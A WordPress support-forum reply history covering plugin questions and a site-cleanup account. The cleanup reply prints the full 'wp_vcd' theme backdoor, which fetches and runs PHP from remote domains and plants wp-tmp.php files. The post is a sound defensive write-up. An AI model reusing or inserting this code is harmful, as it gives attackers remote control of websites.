lfbender

Thank you for this.
I am reviewing what custom fields I actually want people to be able to find and I will test your filter accordingly.

For now my immediate issue has been answered and resolved.

Thank you for the fast and thorough help.

??

Yes, I have selected also checkbox fields for indexing.

I did not think it would be a problem.

And yes, removing the ckeckbox fields from the indexed custom fields unstuck the process.

Thank you.

So just to know: there is no way to index checkbox custom fields right now?

Hi @takashimatsuyama and thanks for the answer.

I am already using the custom template.

Yes, I would be interested in only the number of saved posts for the user and to display that number on an archive page saying, “You have saved 3 favorites”.

FacetWP just came out with an update that includes a fix for this too (ver 3.8.1), so this works now.

Here is some more info from facetWP support:

When I look at the AJAX response, your site’s HTML header is getting injected into the response, causing the JSON to break. This is usually caused by some sort of output buffering that gets opened but not closed properly. I.e. also check for any custom uses of ob_start()…

The hook works now and I don’t have an explanation as to what changed. Might have been a caching issue.

The problem was a piece of bad Javascript code I wrote.

     let mPoint = (document.createTextNode = point);

I find it still interesting that the console error lead me to anywhere else than to the faulty line in my script.

After fixing this, there were no more errors.

So, I noticed that the var_dump gave the strings with spaces. So I removed the spaces from the list of excludes, only leaving:

user1,user2,user3

(without any spaces), and now it seems to work.

I would put a warning regarding this, to clarify that you need the list without spaces. Or just run the list through a regex replace or something.

Thanks for the quick response and help!

It returns the list of excluded Users:
array(7) { [0]=> string(3) “user1″ [1]=> string(5) ” user2″ [2]=> string(7) ” user2″ [3]=> string(5) ” user3″ [4]=> string(6) ” user4″ [5]=> string(9) ” user5″ [6]=> string(7) ” user6″ } int(10) string(5) “user7” ?

But the log still shows the searches…

Hi @msaari,

I went to Relevanssi Search Options –> Logging –> Exclude users.

I listed the user ids, like this:
1, 2, 3, 4
I saved.

I went to the search form on my home page and did a search.

Then I went to Dashboard –> User searches to check if my search showed up (I excluded also my user id) and it did.

I repeated all the above using user names, instead of user id with the same result.

What did I miss?

@bcworkz Thank you. Although I didn’t use the exact way you have described, you helped me find a way that works. I used filenames and filepaths to identify if the PDF will have a different title or not and unlinked based on that. If it is just an update, it just overwrites the file, no unlinking needed, if it is a file with a new name, it deletes the old attachment.

I have the same issue.

So I managed to clean all my sites (7), so thank you @simplix.

These are the steps I have taken (using also what @simplix wrote).

At the very beginning of the functions.php in the affected theme was a whole code before any other that looked like this:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '****random looking numbers****'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{

case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle   = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle   = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key='12335f8c45ff73be536601a7562a3220';
if (($tmpcontent = @file_get_contents("https://www.parors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.parors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("https://www.parors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
} 

elseif ($tmpcontent = @file_get_contents("https://www.parors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 

} 

}
}

//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>

I deleted this.

Then I went into the wp-includes folder and deleted:
wp-vcd.php
wp-tmp.php
wp-feed.php

Then I went into phpMyAdmin for the database cleaning:

I did a full database search for %bullgoesdown% and %wiilberedmodels% (these were the pages that the user was sent to, even though it is not the page you see when you see the redirect in action because these sites are also only redirecting)which gave me probably every single post and page content. From this I saw the exact scripts and where the malware has made changes.

I used the exact script to do what @simplix suggested for the post_content column of the wp_posts table. Then I found and changed the malware site addresses in wp_options.

If you have a hard time finding initial data on what to look for I used https://aw-snap.info which has a tool for printing out the pages code for analyzing. There you should be able to find the scripts that are used and keywords for the spammy domains.

As a last step I deleted the wp-rocket cache, changed passwords, deleted unused themes and updated all plugins that were free.

Hope this helps someone else too.

• This reply was modified 5 years, 2 months ago by lfbender.
• This reply was modified 5 years, 2 months ago by lfbender.

Thank you @simplix for this.

I tried to follow your instructions as closely as possible and I found additional things in the database to correct. I didn’t however find anything for the guid and the postmeta.
Which wouldn’t bother me, except the site’s behavior didn’t change, so there has to be other things. I now saw that I probably have other things in the files too, I just have no idea what to look for anymore.
I cannot unfortunately update the plugins as wp-admin is still not accessible.